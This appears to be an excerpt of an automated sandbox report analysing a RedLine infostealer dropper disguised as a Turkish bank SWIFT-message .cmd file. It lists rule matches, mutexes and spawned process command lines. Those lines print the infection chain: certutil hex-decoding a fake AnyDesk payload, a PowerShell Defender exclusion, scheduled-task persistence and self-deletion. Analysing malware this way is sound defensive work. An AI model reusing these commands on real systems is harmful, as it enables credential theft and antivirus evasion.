                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EBE68017_2_00007FF706EBE680
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC0A6C17_2_00007FF706EC0A6C
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EBD25017_2_00007FF706EBD250
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB9E5017_2_00007FF706EB9E50
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB765017_2_00007FF706EB7650
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB524017_2_00007FF706EB5240
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB4A3017_2_00007FF706EB4A30
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EDAA3017_2_00007FF706EDAA30
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB222017_2_00007FF706EB2220
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC422417_2_00007FF706EC4224
                      Source: unknown, Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                      Source: 27.2.Native_neworigin.exe.2fe0000.3.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 27.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 43.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 27.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 43.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: armsvc.exe.25.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: alg.exe.27.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: AppVClient.exe.27.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: DiagnosticsHub.StandardCollector.Service.exe.27.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: FXSSVC.exe.27.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, cPs8D.cs, Cryptographic APIs: 'TransformFinalBlock'
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, 72CF8egH.cs, Cryptographic APIs: 'TransformFinalBlock'
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, G5CXsdn.cs, Cryptographic APIs: 'TransformFinalBlock'
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, 3uPsILA6U.cs, Cryptographic APIs: 'CreateDecryptor'
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, 6oQOw74dfIt.cs, Cryptographic APIs: 'TransformFinalBlock'
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, aMIWm.cs, Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, 3QjbQ514BDx.cs, Cryptographic APIs: 'TransformFinalBlock'
                      Source: classification engine, Classification label: mal100.spre.bank.troj.spyw.evad.winCMD@61/169@305/22
                      Source: C:\Users\Public\alpha.exe, Code function: 9_2_00007FF706EB32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError
                      Source: C:\Users\Public\kn.exe, Code function: 12_2_00007FF627B2826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle
                      Source: C:\Users\Public\alpha.exe, Code function: 9_2_00007FF706EDFB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z
                      Source: C:\Users\Public\kn.exe, Code function: 12_2_00007FF627A846C0 CoCreateInstance,#357,SysFreeString
                      Source: C:\Users\Public\kn.exe, Code function: 12_2_00007FF627B06320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError
                      Source: C:\Windows\System32\extrac32.exe, File created: C:\Users\Public\alpha.exe
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, Mutant created: NULL
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif, Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-8c4bfd40d4df6ab2-inf
                      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, Mutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif, Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-8c4bfd40d4df6ab2cd68e75b-b
                      Source: C:\Windows\System32\alg.exe, Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-8c4bfd40d4df6ab29ea72c54-b
                      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif, File created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\extrac32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: alg.exe, 0000001D.00000003.2787263519.0000000000420000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: alg.exe, 0000001D.00000003.2787263519.0000000000420000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: alg.exe, 0000001D.00000003.2787263519.0000000000420000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd ReversingLabs: Detection: 13%
                      Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                      Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                      Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                      Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
                      Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: unknown Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknown Process created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: unknown Process created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
                      Source: C:\Windows\System32\conhost.exe Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: unknown unknown
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: unknown unknown
                      Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
                      Source: C:\Windows\System32\extrac32.exe Section loaded: cabinet.dll
                      Source: C:\Windows\System32\extrac32.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\extrac32.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\extrac32.exe Section loaded: textinputframework.dll
                      Source: C:\Windows\System32\extrac32.exe Section loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll
                      Source: C:\Windows\System32\extrac32.exe Section loaded: ntmarta.dll
                      Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
                      Source: C:\Windows\System32\extrac32.exe Section loaded: textshaping.dll
                      Source: C:\Users\Public\kn.exe Section loaded: certcli.dll
                      Source: C:\Users\Public\kn.exe Section loaded: cabinet.dll
                      Source: C:\Users\Public\kn.exe Section loaded: cryptui.dll
                      Source: C:\Users\Public\kn.exe Section loaded: ncrypt.dll
                      Source: C:\Users\Public\kn.exe Section loaded: netapi32.dll
                      Source: C:\Users\Public\kn.exe Section loaded: ntdsapi.dll
                      Source: C:\Users\Public\kn.exe Section loaded: version.dll
                      Source: C:\Users\Public\kn.exe Section loaded: secur32.dll
                      Source: C:\Users\Public\kn.exe Section loaded: certca.dll
                      Source: C:\Users\Public\kn.exe Section loaded: cryptsp.dll
                      Source: C:\Users\Public\kn.exe Section loaded: samcli.dll
                      Source: C:\Users\Public\kn.exe Section loaded: logoncli.dll
                      Source: C:\Users\Public\kn.exe Section loaded: dsrole.dll
                      Source: C:\Users\Public\kn.exe Section loaded: netutils.dll
                      Source: C:\Users\Public\kn.exe Section loaded: sspicli.dll
                      Source: C:\Users\Public\kn.exe Section loaded: ntasn1.dll
                      Source: C:\Users\Public\kn.exe Section loaded: uxtheme.dll
                      Source: C:\Users\Public\kn.exe Section loaded: profapi.dll
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: apphelp.dll
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: version.dll
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: uxtheme.dll
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: url.dll
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: ieframe.dll
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: iertutil.dll
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: netapi32.dll
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: userenv.dll
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: winhttp.dll
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: wkscli.dll
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: netutils.dll
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: ??.dll
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: ???????.dll
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
